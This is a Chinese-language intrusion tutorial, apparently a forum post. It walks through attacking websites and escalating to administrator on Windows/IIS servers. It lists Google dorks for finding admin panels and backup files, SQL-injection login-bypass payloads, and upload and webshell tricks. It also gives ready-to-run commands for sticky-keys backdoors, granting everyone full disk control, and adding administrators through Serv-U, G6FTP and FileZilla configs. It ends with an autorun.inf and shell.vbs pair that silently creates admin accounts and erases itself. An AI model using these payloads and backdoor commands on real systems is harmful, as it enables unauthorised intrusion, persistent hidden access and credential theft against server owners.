先看站点
拿shell的方法太多了 主要是提权和入侵思路
踩点 PING命令ping系统 TTL=32 9X/ME
TTL=64 LINUX
TTL=128 2000X/XP
TTL=255 UNIX
1.对域名、ip、注册信息、同ip多网站的踩点
ip138 ip
ip866 注册信息 收录
打开http://whois.chinaz.com/Default.aspx
是什么类型的 asp 还是 php 还jsp 看能不能直接找到后台
右击看下图片路径 猜站点后台根目录 有时候还可以看出是什么上传
直接后台上传(像这种 http://www.xxx.com/uploadfile/ 等等)
还是编辑器上传(像这种 http://www.xxx.com/admin/uploadfile/ 等等) 有时候直接暴露eweb
试试注入 啊D配合google 批量搜索 site:xxx.com inurl:asp?id=
试试找编辑器 google搜索 site:xxx.com inurl:ewebeditor
类似的还有 editor/ewebedit/FCKeditor/cuteeditor/syWebEditor/fck/eweb/
还可以通过搜索
site:xxx.com inurl:/upload
/upfile
/Uploads
/Upfiles
/Uploadfile
/filemanager
/Uploadfile08
/Uploadfile12
/*+Uploads
/Files
还有试试 上传漏洞 有时候不需要 可以上传 自己抓包 改包 或者修改上传路径 欺骗上传
自己猜一下后台
http://www.***.com/admin
还可以手动试试/login /manage /manager /admin_login /login_admin /system /master /boss
利用google找后台:
site:xxx.com inurl:admin
类似的还有 inurl:login/admin/manage/manager/admin_login/login_admin/system/boss/master
site:www.***.com intext:管理|后台|登陆|用户名|密码|验证码|系统|帐号|manage|admin|login|system
site:www.***.com intitle:管理|后台|登陆|
通过google找重要文件
site:xxx.com inurl:robots.txt 这个也可能找得到后台
site:xxx.com inurl:robots.txt
site:xxx.com filetype:mdb
site:xxx.com filetype:ini
site:xxx.com inurl:txt
site:xxx.com filetype:.bak
site:xxx.com filetype:asmx
inurl:webservices|webservice|service|services
site:xxx.com filetype:php
site:xxx.com filetype:asp
利用工具扫网站检测注入、xss、目录 还有可能扫到别人的shell
试试扫注入 jsky/wvs/awvs
试试扫目录 wwwscan/jsky/wvs/awvs 查看铭感目录
试试扫XSS wwwscan/jsky/wvs/awvs 通过xss掉网站账号
如果扫到别人的shell
先利用社会工程学 猜根据shell的名字 shell登陆信息 还不行
用 爆破工具去爆破 webshell爆破软件 、不然溯雪也可以
在找其他的方法入侵
还是无法入侵 给大家一条建议;实在拿不下可以 利用google 采取迂回策略
看手法
google搜索:
格式 自己的shell的信息 换下面的信息 如果shell
名字叫做 keio.asp
标题叫做:旁注-网站小助手
中间的文字中有: 本文保存的绝对路径
google搜索:
inurl:/keio.asp
intitle :旁注-网站小助手
intext : 本文保存的绝对路径
用iis扫描一下 iis读写权限
namp扫描 一下端口开放情况
根据namp扫描的信息
利用hscan扫描弱口令 或者流光也可以
开了21可以试一下ftp爆破
开了3389还可以试一下 3389简单爆破
试试旁注 一般旁注都可以拿到一个shell权限 在利用一些 提权利器提权
xiaoA.exe pr.exe 巴西.exe MS 等等
利用echo 或者 copy 一个shell到目标网站
如果旁注拿到一个网站的shell但提权不上 而目标网站有 编辑器的话
可以上传 一个test.asp 内容如下
<%Session("eWebEditor_User") = "11111111"%>
先访问下test.asp 在访问目标站点的ewebeditor后台的文件 说不定能进去
不行用vbs获取iis配置信息也可以
不然通过第三方软件提权
lpk提权
替换软件提权
asp的shell记得配合啊D的扫可写可读目录 aspx的shell 配合欧欧的 扫可写可读目录
cmd.exe 可以 改成cmd.com / cmd.db / cmd.txt 也可以运行
还可以找 网站配置信息 sa 或者 mysql 的相关密码 有时候是私人服务器 还
可以通过下数据库 破服务器各个网站的密码社工
asp的 inc/conn.asp
conn.asp
config.asp
aspx的 Web.Config
inc/conn.asp
conn.asp
config.asp
还有一些 log ini文件 txt文件 记得多看看 说不定记录有密码
旁注不行 用C段
收集信息从始至终 社工很重要
有很多网站都是有源码下载的 或者一些oday、exp
自己搭建环境 找后台路径 数据库路径 再去迂回入侵
一些整理的资料
找到后台 试试用Cookie欺骗进入网站管理后台
试试万能密码
asp的
' or''='
' or 1=1--
' or 'a'='a--
'or'='or'
" or 1=1--
or 1=1--
or 'a='a
" or "a"="a
') or ('a'='a
") or ("a"="a
) or (1=1
'or''='
php万能密码
(’ or 1=1 -- , ‘ or 1=1 # 和‘ or 1=1 /*)
User: something
Pass: OR 1=1
jsp 万能密码
1or1=1
admin OR 1=1/*
1'or'1'='1
'or'='or'
有时候可能直接绕过
1.
已知后台目录:http://www.xxx.com/admin
直接跳转登陆页面:http://www.xxx.com./admin (注意中间加的一点)
直接进入登陆页面
2.
比如:http://allyesno.cnblogs.com/admin/login.aspx
如果输入密码错误返回到http://allyesno.cnblogs.com/admin/error.aspx
如果输入http://allyesno.cnblogs.com/admin%5Cindex.aspx 说不定可以饶过验证。
3.md5破解不出 :改密码试试
http://注入网址;update admin set password='新MD5密码' where password='旧MD5密码'-- [admin为表名.]
1
****************************************提权篇-**************************
-----------------------------------第一.自身漏洞提权---------------------
0.先查看组建 端口 能执行cmd就看服务:net start
net 不行就用net1 不行就自己上传一个net到可写可读目录
脚本也探测下支不支持aspx jsp php
1.先利用 提权利器 提权 组建支持 直接cmd.exe 命令 拒绝访问 自己上传cmd.exe到可写可读目录 执行命令
还是拒绝 上传command.com 或者将cmd.exe 改名cmd.com 或者cmd.db或cmd.txt 上传
2. 组建不支持 那就执行cmd2 还是不行 自己找可写可读目录 上传 cmd.exe 到可写可读目录 执行命令
还是拒绝 上传command.com 或者将cmd.exe 改名cmd.com 或者cmd.db或cmd.txt 上传
cmd可以执行命令了上传提权利器 xiaoA.exe pr.exe 巴西.exe MS fuck.exe e
上传 执行 有时候不能执行 把提权利器也改后缀上传 .com .mdb .txt
3. 试试serv通杀7.8.9版本提权
4. aspx 自带的 iis_spy 列举 跨过去 不能跨就 echo 或 copy
5. 修改文件权限 cacls E:\index.asp /t /e /c /g interactive:f
权限设置
cacls.exe c: /e /t /g everyone:F #把c盘设置为everyone可以浏览
cacls.exe d: /e /t /g everyone:F #把d盘设置为everyone可以浏览
cacls.exe e: /e /t /g everyone:F #把e盘设置为everyone可以浏览
cacls.exe f: /e /t /g everyone:F #把f盘设置为everyone可以浏览
cacls d:\website /g everyone /e /t授与完全控制
6. 通过一个lml.vbs列目录脚本 列出所有网站路径:
lml.vbs脚本内容:
On Error Resume Next
If (LCase(Right(WScript.Fullname,11))="wscript.exe") Then
Msgbox Space(12) & "IIS Virtual Web Viewer" & Space(12) & Chr(13) & Space(9) & " Usage:Cscript vWeb.vbs",4096,"Lilo"
WScript.Quit
End If
Set ObjService=GetObject("IIS://LocalHost/W3SVC")
For Each obj3w In objservice
If IsNumeric(obj3w.Name) Then
Set OService=GetObject("IIS://LocalHost/W3SVC/" & obj3w.Name)
Set VDirObj = OService.GetObject("IIsWebVirtualDir", "ROOT")
If Err <> 0 Then WScript.Quit (1)
WScript.Echo Chr(10) & "[" & OService.ServerComment & "]"
For Each Binds In OService.ServerBindings
Web = "{ " & Replace(Binds,":"," } { ") & " }"
WScript.Echo Replace(Split(Replace(Web," ",""),"}{")(2),"}","")
Next
WScript.Echo "Path : " & VDirObj.Path
End If
Next
保存
执行 /c cscript d:\freehost\xxx\web\lml.vbs
不行的话 自己上传一个 cscript.exe到可读可写目录 在执行一次看行不行
5.利用
6. 安装5次shift后门,沾滞键后门,替换SHIFT后门:
5次SHIFT,沾滞键后门:
copy %systemroot%\system32\sethc.exe %systemroot%\system32\dllcache\sethc1.exe
copy %systemroot%\system32\cmd.exe %systemroot%\system32\dllcache\sethc.exe /y
copy %systemroot%\system32\cmd.exe %systemroot%\system32\sethc.exe /y
替换SHIFT后门:
attrib c:\windows\system32\sethc.exe -h -r -s
attrib c:\windows\system32\dllcache\sethc.exe -h -r -s
del c:\windows\system32\sethc.exe
copy c:\windows\explorer.exe c:\windows\system32\sethc.exe
copy c:\windows\system32\sethc.exe c:\windows\system32\dllcache\sethc.exe
attrib c:\windows\system32\sethc.exe +h +r +s
attrib c:\windows\system32\dllcache\sethc.exe +h +r +s
2
---------------------------有控制权限的目录---------------------
有erveryone完全控制的目录 具有可写可读权限 自己可以上传啊D 和欧欧的 读可写可读目录的脚本
1.c:\winnt\system32\inetsrv\data\
是 erveryone完全控制,很多时候没作限制,把提升权限的工具上传上去,然后执行
2.第3方软件的写日志目录‘log’普遍存在可写可执行权限
3.C:\Documents and Settings\All Users\Application Data\Microsoft\Media Index\
4.
------------------------------第3:第三方软件提权--------------------------
记住 用lpk.dll劫持添加用户利用文件提权
将lpk.dll放到任意目录
执行当前目录里的任意exe(最好是第三方程序)
系统就会添加一个账号
去开始程序拿下 下载快捷方式 到本地电脑查看第三方软件路径
找到路径 看能跳转进去
C:\
D:\
C:\Program Files\
D:\Program Files\ 一般安装地方软件路径都在他们下面 不过也有
1.paanywhere
C:\Documents and Settings\All Users\Application Data\Symantec\pcAnywhere\ 一般 host目录 下他的 GIF
文件,在本地安装 pcanywhere上去
2.Serv-U, 如果有权限修改 ServUDaemon.ini,加个用户上去,密码为空
[USER=WekweN|1]
Password=
HomeDir=c:\
TimeOut=600
Maintenance=System
Access1=C:\|RWAMELCDP
Access1=d:\|RWAMELCDP
Access1=f:\|RWAMELCDP
SKEYvalues=
这个用户具有最高权限,然后我们就可以 ftp上去
quote site exec net.exe user hk pass /add
quote site exec net.exe localgroup administrators hk/add
3. VNC提权 利用
shell 读取 vnc 保存在注册表中的密文,然后再使用工具VNC4X破解。
VNC4
注册表位置:HKEY_LOCAL_MACHINE\SOFTWARE\RealVNC\WinVNC4\password
Radmin 默认端口是4899,
Regedit/e c:\123.txt HKEY_LOCAL_MACHINE\SOFTWARE\RealVNC\WinVNC4\HKLM/SOFTWARE/Real VNC/winVNC4/portnumber 端口位置
VNC3 如下位置:
HKCU/software/orl/winVNC3/portnamber
HKCU/software/orl/winVNC3/password
读出来的都是10禁止的 需转换16禁制
VNC密码破解软件 VNCX.exe -w 2位 2位 的输入账号密码 cain 直接输入全部 然后VNC登陆工具登陆
4. FlashFXP 提权
找到 FlashFXP下的 Sites. dat 这个文件(编辑) 看有没有密码 有密码 就下载下来有时候stats.bat sites。bat quick.bat 全下下来 替换
flashfxp 文件夹的相应文件。打开 flashfxp 在站点中打开站点管理器 得到加密ftp密码 用xp星号密码查看器查看明文
5.搜狗输入法 PinyinUp.exe 提权:
搜狗输入法的“PinyinUp.exe”是可读可写的直接替换即可,位于搜狗安装目录下,例如:
“C:\Program Files\SogouInput\5.0.0.3819\PinyinUp.exe”
搜狗拼音输入法,会定时调用这个文件进行升级,禁止还禁止不掉,呵呵,天然的后门。
6. QQ 迅雷 BT 等工具的同目录提权
把此ws2help.dll文件放到QQ 迅雷 BT 等工具的同目录 会提权
迅雷提权2
安装目录下的geturl.htm getAllurl.htm 里面加入代码,其实也很渺茫。
进行提权
7.G6FTP提权
打开RemoteAdmin目录的Remote.ini文件,可查到管理员
32位MD5加密的密文,破解admin 一般不能直接连
需要端口转发 比如 Fpipe -l 28 -r 8021
然后连接他的 28端口
练上去 添加用户 设置E盘所有权限
然后 site commands (就是添加命令
command: hacker
description: hacker
EXEcute: 添加一个1.bat的批处理)
然后连接ftp
执行 quote hacker 就会执行1.bat
1.bat 的内容
net user keio keio.asd /add & net localgroup administrators keio /add
8.radmin提权 技巧
默认密码 注册表位置
HKEY_LOCAL_MACHINE/SYSTEM/RAdmin/V2.0/server/parameters/parameter
默认端口位置
HKEY_LOCAL_MACHINE/SYSTEM/RAdmin/V2.0/server/parameters/port
Regedit /e C:/radmin.reg HKEY_LOCAL_MACHINE/SYSTEM/RAdmin/V2.0/server/parameters
利用注册表到处 radmin信息 之后查看密码 登陆上去 hash可以不破解 一png radmin hash 版登陆输入hash
radmin 3.0提权
将winmm.dll 放到radmin3.x目录下 下次登陆会自动记录账号
记录文件在 C:/windows/system32/ramin.log
查看就可以
9.leap ftp提权
下载sites.ini 覆盖本地 的就能找到ftp账号密码 用密码星号查看器
8.WinWebMail 提权加用户:
WinWebMail目录下的web必须设置everyone权限可读可写,在开始程序里,找到WinWebMail快捷方式,接下来,看路径,访问“路径\web”传 shell,访问shell后,权限是system,直接放远控进启动项,等待下次重启。
没有删cmd组件的可以直接加用户,7i24的web目录也是可写,权限为administrator。
9. 14147 FileZilla Server 提权 FileZilla+Server+Interface.xml这个文件存放了端口 密码等信息
先转下端口 不然不能直接连
本机 lcx.exe -listen 456 458
服务器上 lcx.exe 我的外网ip 456 127.0.0.1 服务器ip 14147
本地安装filezilla server 打开软件 连接到服务器 ip输入127.0.0.1 端口些458
输入之前找 的 账号密码 进去之后 用户配置 添加用户 共享目录 设置权限 全勾上
替换服务器提权 上传启动项提权 不能想serv-u一样执行目命令提权
10.3389全拼输入法漏洞:
Ctrl+Shift”组合键,快速切换至全拼输入法 用鼠标右键点击状态条上的微软徽标,选取“帮助”(呈灰色说明打了补丁)中的“操作指南”,在“输入法操作指南”的左上角点击鼠标右键,在弹出的菜单中选择“跳至URL(J)…”输入C:\WinNT\System32 找到net.exe,并为net.exe创建一个快捷方式 确定 取“属性”,在“目标”中的c:\winnt\system32\net.exe user keio keio123 /add & net.exe localgroup administrators keio /add
##########NextPage[title=5]##########
---------------------------------第4:其他方法提权:------------------------------
1. c:\DocumentsandSettings\AllUsers\「开始」菜单\程序\启
动"写入 bat,vbs 等木马。
2.下他的sam 一般下C盘 windows/repair下的sam 可能密码是以前的
3. asp.dll提权
把asp.dll加入特权的dll一族之中.提升步骤为:
<1>先查看有特权一话有哪些.
查看有特权的dll文件: 命令为:cscript adsutil.vbs get /W3SVC/InProcessIsapiApps
得到显示为: 之前省略
“C:\\WINNT\\system32\\idq.dll”
“C:\\WINNT\\system32\\inetsrv\\httpext.dll”
“C:\\WINNT\\system32\\inetsrv\\httpodbc.dll”
“C:\\WINNT\\system32\\inetsrv\\ssinc.dll”
“C:\\WINNT\\system32\\msw3prt.dll”
说明的是有特权限一族为:idq.dll httpext.dll httpodbc.dll ssinc.dll msw3prt.dll
<2>加asp.dll加入特权一族
因为asp.dll是放在c:\\winnt\\system32\\inetsrv\\asp.dll (不同的机子放的位置不一定相同)
加进去
cscript adsutil.vbs set /W3SVC/InProcessIsapiApps
"C:\\WINNT\\system32\\idq.dll"
"C:\\WINNT\\system32\\inetsrv\\httpext.dll"
"C:\\WINNT\\system32\\inetsrv\\httpodbc.dll"
"C:\\WINNT\\system32\\inetsrv\\ssinc.dll"
"C:\\WINNT\\system32\\msw3prt.dll"
"c:\\winnt\\system32\\inetsrv\\asp.dll"
用cscript adsutil.vbs get /W3SVC/InProcessIsapiApps 来查看是不是加进去了 set是设置 get是查看
提权完毕
4.auto.ini 加 SHELL.VBS
autorun.inf
[autorun]
open=shell.vbs
shell.vbs
dim wsh
set wsh=createObject("WScript.Shell")
wsh.run "net user guest /active:yes",0
wsh.run "net user guest 520ls",0
wsh.run "net localgroup administrators guest /add",0
wsh.run "net user hkbme 520ls /add",0
wsh.run "net localgroup administrators hkbme /add",0
wsh.run "cmd.exe /c del autorun.inf",0
wsh.run "cmd.exe /c del shell.vbs",0
将这两将这两个文件放到对方硬盘的根目录下